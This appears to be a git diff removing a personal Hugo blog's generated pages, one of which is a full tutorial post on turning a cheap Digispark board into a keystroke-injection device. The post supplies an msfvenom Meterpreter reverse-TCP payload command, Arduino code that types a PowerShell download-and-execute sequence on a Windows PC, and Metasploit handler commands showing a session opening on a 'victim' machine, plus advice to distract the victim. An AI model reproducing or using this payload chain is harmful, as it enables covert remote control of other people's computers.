<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container taxonomy">
<h1 class="title">
<a class="title-link" href="https://n0x.io/authors/">Authors</a>
</h1>
<ul>
<li>
<span class="taxonomy-element">
<a href="https://n0x.io/authors/_n0x/"></a>
<sup>4</sup>
</span>
</li>
</ul>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,20 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Authors on n0x.io</title>
<link>https://n0x.io/authors/</link>
<description>Recent content in Authors on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language>
<lastBuildDate>Wed, 26 May 2021 11:14:07 +0200</lastBuildDate><atom:link href="https://n0x.io/authors/index.xml" rel="self" type="application/rss+xml" />
<item>
<title></title>
<link>https://n0x.io/authors/_n0x/</link>
<pubDate>Wed, 26 May 2021 11:14:07 +0200</pubDate>
<guid>https://n0x.io/authors/_n0x/</guid>
<description>_N0x is just a dude way to interested in anything computer related. Be it hardware, software, programming or even gaming.</description>
</item>
</channel>
</rss>

@ -1,181 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Categories"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="Categories" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/categories/" />
<title>Categories · n0x.io</title>
<link rel="canonical" href="https://n0x.io/categories/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/categories/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container taxonomy">
<h1 class="title">
<a class="title-link" href="https://n0x.io/categories/">Categories</a>
</h1>
<ul>
</ul>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,10 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Categories on n0x.io</title>
<link>https://n0x.io/categories/</link>
<description>Recent content in Categories on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language><atom:link href="https://n0x.io/categories/index.xml" rel="self" type="application/rss+xml" />
</channel>
</rss>

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 545 KiB

@ -1,216 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="n0x.io"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="n0x.io" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/" />
<title>n0x.io</title>
<link rel="canonical" href="https://n0x.io/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container centered">
<div class="about">
<div class="avatar"><img src="https://n0x.io/images/spoopy.gif" alt="avatar"></div>
<h1>_N0x</h1>
<h2>» Here be dragons «</h2>
<ul>
<li>
<a href="https://gitlab.com/n0x_io" aria-label="GitLab" >
<i class="fa fa-gitlab fa-2x" aria-hidden="true"></i>
</a>
</li>
<li>
<a href="https://github.com/n0x-io/" aria-label="Github" >
<i class="fa fa-github fa-2x" aria-hidden="true"></i>
</a>
</li>
<li>
<a href="https://twitter.com/n0x_io" aria-label="Twitter" >
<i class="fa fa-twitter fa-2x" aria-hidden="true"></i>
</a>
</li>
</ul>
</div>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,64 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>n0x.io</title>
<link>https://n0x.io/</link>
<description>Recent content on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language>
<lastBuildDate>Wed, 26 May 2021 11:14:07 +0200</lastBuildDate><atom:link href="https://n0x.io/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>Hello World! Again!</title>
<link>https://n0x.io/posts/helloworldagain/</link>
<pubDate>Wed, 26 May 2021 11:14:07 +0200</pubDate>
<guid>https://n0x.io/posts/helloworldagain/</guid>
<description>Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related.</description>
</item>
<item>
<title>Git in minutes</title>
<link>https://n0x.io/posts/gitbucket/</link>
<pubDate>Thu, 02 Jul 2020 00:00:00 +0200</pubDate>
<guid>https://n0x.io/posts/gitbucket/</guid>
<description>A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&amp;rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs.</description>
</item>
<item>
<title>Digispark Reverse-Shell</title>
<link>https://n0x.io/posts/digispark_reverseshell/</link>
<pubDate>Sat, 20 Jan 2018 17:03:46 +0100</pubDate>
<guid>https://n0x.io/posts/digispark_reverseshell/</guid>
<description>Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it.</description>
</item>
<item>
<title>HelloWorld</title>
<link>https://n0x.io/posts/helloworld/</link>
<pubDate>Mon, 08 Jan 2018 20:35:40 +0100</pubDate>
<guid>https://n0x.io/posts/helloworld/</guid>
<description>Hello World! Hello there and welcome on n0x.io!
I&amp;rsquo;m _N0x. I&amp;rsquo;m 20 years old and &amp;ldquo;Fachinformatiker für Anwendungsentwicklung&amp;rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)</description>
</item>
<item>
<title>About n0x.io</title>
<link>https://n0x.io/about/</link>
<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
<guid>https://n0x.io/about/</guid>
<description>Contact me E-Mail: tf[@]n0x.io pgp Twitter: @n0x_io GitLab: n0x_io Build with Hugo This Website is generated with Hugo using the Coder Theme
License Unless noted otherwise all content on this website is protected under Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)
This means you are free to share and adapt the content under the following terms:
Share — copy and redistribute the material in any medium or format Adapt — remix, transform, and build upon the material for any purpose, even commercially.</description>
</item>
</channel>
</rss>

@ -1 +0,0 @@
const body=document.body,darkModeToggle=document.getElementById('dark-mode-toggle'),darkModeMediaQuery=window.matchMedia('(prefers-color-scheme: dark)');localStorage.getItem("colorscheme")?setTheme(localStorage.getItem("colorscheme")):body.classList.contains('colorscheme-light')||body.classList.contains('colorscheme-dark')?setTheme(body.classList.contains("colorscheme-dark")?"dark":"light"):setTheme(darkModeMediaQuery.matches?"dark":"light"),darkModeToggle.addEventListener('click',()=>{setTheme(body.classList.contains("colorscheme-dark")?"light":"dark")}),darkModeMediaQuery.addListener(a=>{setTheme(a.matches?"dark":"light")}),document.addEventListener("DOMContentLoaded",function(){let a=document.querySelector('.preload-transitions');a.classList.remove('preload-transitions')});function setTheme(a){body.classList.remove('colorscheme-auto'),inverse=a==='dark'?'light':'dark',localStorage.setItem('colorscheme',a),body.classList.remove('colorscheme-'+inverse),body.classList.add('colorscheme-'+a)}

@ -1,367 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it.">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Digispark Reverse-Shell"/>
<meta name="twitter:description" content="Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it."/>
<meta property="og:title" content="Digispark Reverse-Shell" />
<meta property="og:description" content="Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://n0x.io/posts/digispark_reverseshell/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2018-01-20T17:03:46&#43;01:00" />
<meta property="article:modified_time" content="2018-01-20T17:03:46&#43;01:00" />
<title>
Digispark Reverse-Shell · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/posts/digispark_reverseshell/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container post">
<article>
<header>
<div class="post-title">
<h1 class="title">
<a class="title-link" href="https://n0x.io/posts/digispark_reverseshell/">
Digispark Reverse-Shell
</a>
</h1>
</div>
<div class="post-meta">
<div class="date">
<span class="posted-on">
<i class="fa fa-calendar" aria-hidden="true"></i>
<time datetime='2018-01-20T17:03:46&#43;01:00'>
January 20, 2018
</time>
</span>
<span class="reading-time">
<i class="fa fa-clock-o" aria-hidden="true"></i>
5-minute read
</span>
</div>
<div class="authors">
<i class="fa fa-user" aria-hidden="true"></i>
<a href="https://n0x.io/authors/_n0x/">_N0x</a></div>
</div>
</header>
<div>
<h1 id="reverse-shell-for-150---digispark-instead-of-usb-rubber-ducky">
Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky
<a class="heading-link" href="#reverse-shell-for-150---digispark-instead-of-usb-rubber-ducky">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h1>
<p>Some of you might already have heard of it: The <a href="https://hakshop.com/products/usb-rubber-ducky-deluxe">USB Rubber Ducky by Hak5</a>. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it. The only problem is the high (but reasonable) price of $45. In this tutorial I will show you how you can use the Digispark USB Deveoplment Board as a cheap alternative. As an example we will be creating a reverse shell, that will be launched when you plug the Digispark into a windows PC.</p>
<h2 id="you-will-need">
You will need:
<a class="heading-link" href="#you-will-need">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<ul>
<li><a href="http://digistump.com/products/1">Digispark USB Development Board</a></li>
<li><a href="https://www.kali.org/">Kali Linux</a> with <a href="https://www.metasploit.com/">Metasploid-Framework</a></li>
</ul>
<h2 id="digispark-usb-development-board">
Digispark USB Development Board
<a class="heading-link" href="#digispark-usb-development-board">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>The Digispark from Digistump is a tiny, programmable micro-controller that can be programmed with the <a href="https://www.arduino.cc/en/main/software">Arduino-IDE</a>. The syntax is very similar to the one of Arduino-Boards. A tutorial on how to set the IDE up for the Digispark can be found here: <a href="http://digistump.com/wiki/digispark/tutorials/connecting">Connecting and Programming Your Digispark</a></p>
<p>I bought a bunch of Digisparks of eBay for little money. They aren&rsquo;t original (you can tell from the &ldquo;rev3&rdquo; which was never released) but they still are fully functional and perfect for our purposes.</p>
<p>For a nice video to set the Digispark up, check out this <a href="https://www.youtube.com/watch?v=fGmGBa-4cYQ">tutorial by Seytonic</a></p>
<h2 id="creating-the-payload">
Creating the Payload
<a class="heading-link" href="#creating-the-payload">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>First of all we need to create the payload that will be deployed and executed by the Digispark on our target machine. We will use <a href="https://www.offensive-security.com/metasploit-unleashed/msfvenom/">MSFvenom</a> for this.</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444 -f psh-cmd
</code></pre>
<p>You need to replace the LHOST parameter with you IP address. You also could use your domain and use the reverse shell even outside of your network.</p>
<p>Now&hellip; here we find the first difficulty. Unlike the Rubber Ducky which can use a SD-card of any size, the Digispark only has 6kb of internal memory and the library we are going to need to use the Digispark as a Keyboard itself has about 2,4kb. So there is no space to place the payload directly on it.
To get our payload on the victim-PC we need to make it accessible on the web. We could use a local web-server, upload the plain payload to <a href="http://pastebin.com/">pastebin</a> or just place it on our webspace.</p>
<h2 id="programming-the-digispark">
Programming The Digispark
<a class="heading-link" href="#programming-the-digispark">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>After we&rsquo;ve created the Payload we can start with programming the Digispark! Here we have to keep in mind that to program the Digispark you have to work with a US-Keyboard-Layout, this means you have to account for special characters and such if your keyboard layout is one of foreign origin.</p>
<p>The Sourcecode for the Digispark:</p>
<pre><code>#include &quot;DigiKeyboard.h&quot;
/* US-KEYBOARD-LAYOUT ONLY!!
*
* still needs some testing... but should work
*
* Made by _N0x
* Thanks to Alex (http://0xdeadcode.se/archives/581) for the idea of using a small powershell payload.
*/
void setup() {
// Adding some LED-effects just for fun ;)
pinMode(1, OUTPUT);
delay(100);
// WIN+r, delete content, start powershell
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // WIN+r
delay(100);
DigiKeyboard.sendKeyStroke(KEY_DELETE); // Clean it up
delay(50);
DigiKeyboard.println(&quot;powershell&quot;);
delay(500);
// turn the LED on
digitalWrite(1, HIGH);
// $url = '...' --&gt; URL to Payload
DigiKeyboard.println(&quot;$url = 'LINK_TO_HOSTET_PAYLOAD'&quot;);
delay(50);
// $result = Invoke-WebRequest -Uri $url
DigiKeyboard.println(&quot;$result = Invoke-WebRequest -Uri $url&quot;);
delay(50);
// powershell.exe -nop -e $result.content
DigiKeyboard.println(&quot;powershell.exe -nop -e $result.content&quot;);
// turn off the led if the payload is places and executed
digitalWrite(1, LOW);
delay(1500);
DigiKeyboard.println(&quot;exit&quot;);
}
void loop() {
// if done with the scripts LED starts blinking
digitalWrite(1, HIGH);
delay(150);
digitalWrite(1, LOW);
delay(500);
}
</code></pre>
<p>In principle you can leave the script unchanged and only change the URL for the Payload, so that the Payload you chose can be downloaded. The Digispark should now be ready for use! Before you storm out and try to plug it into the next best USB-Port though, you should prepare Kali Linux so that your Reverse-Shell Session can be accessed directly and as soon as needed.</p>
<h2 id="preparing-msfconsole">
Preparing MSFconsole
<a class="heading-link" href="#preparing-msfconsole">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>To prepare the receiving-end for the Reverse-Shell, open a Terminal on your Kali Linux system and start MSFconsole by entering</p>
<pre><code>root@kali:~# msfconsole
</code></pre>
<p>Then specify what exploit you want to use:</p>
<pre><code>msf &gt; use exploit/multi/handler
</code></pre>
<p>Now there are still some parameters we have to determine:</p>
<pre><code>msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf exploit(handler) &gt; set LHOST 10.0.0.10
LHOST =&gt; 10.0.0.10
msf exploit(handler) &gt; set LPORT 4444
LPORT =&gt; 4444
</code></pre>
<p>Replace the vlaue of LHOST with the IP/Domain you used when creating the payload with MSFconsole</p>
<p>To finish things off we have to tell our Console that it has to wait for a new session:</p>
<pre><code>msf exploit(handler) &gt; exploit -z -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.0.10:4444
[*] Starting the payload handler...
</code></pre>
<p>Now it&rsquo;s done! You can search for the next best PC to test your Digispark out! After you plug your Digispark in a Powershell will be opened and then closed, within this timeframe you have to distract your victim, after your USB Dev. Board starts to blink fastly you know your script has been executed and you can unplug the Digispark. If everything went how it should&rsquo;ve your console should display this:</p>
<pre><code>msf exploit(handler) &gt; [*] Sending stage (957487 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.10:4444 -&gt; 10.0.0.3:49678) at 2017-02-06 20:25:36 +0100
</code></pre>
<p>At last you have to pin your session, like this:</p>
<pre><code>msf exploit(handler) &gt; sessions -i 1
[*] Starting interaction with 1...
meterpreter &gt;
</code></pre>
<p>And now: Congratulations! You now have a Reverse-Shell on your victims PC! With the command &ldquo;help&rdquo; you can see what you can do now.</p>
<p>Have fun, Good luck, Stay safe and don&rsquo;t let yourself get distracted by people with a Digispark! :D</p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,297 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs.">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Git in minutes"/>
<meta name="twitter:description" content="A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs."/>
<meta property="og:title" content="Git in minutes" />
<meta property="og:description" content="A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://n0x.io/posts/gitbucket/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-07-02T00:00:00&#43;02:00" />
<meta property="article:modified_time" content="2020-07-02T00:00:00&#43;02:00" />
<title>
Git in minutes · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/posts/gitbucket/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container post">
<article>
<header>
<div class="post-title">
<h1 class="title">
<a class="title-link" href="https://n0x.io/posts/gitbucket/">
Git in minutes
</a>
</h1>
</div>
<div class="post-meta">
<div class="date">
<span class="posted-on">
<i class="fa fa-calendar" aria-hidden="true"></i>
<time datetime='2020-07-02T00:00:00&#43;02:00'>
July 2, 2020
</time>
</span>
<span class="reading-time">
<i class="fa fa-clock-o" aria-hidden="true"></i>
3-minute read
</span>
</div>
<div class="authors">
<i class="fa fa-user" aria-hidden="true"></i>
<a href="https://n0x.io/authors/_n0x/">_N0x</a></div>
</div>
</header>
<div>
<h1 id="a-git-server-setup-in-minutes">
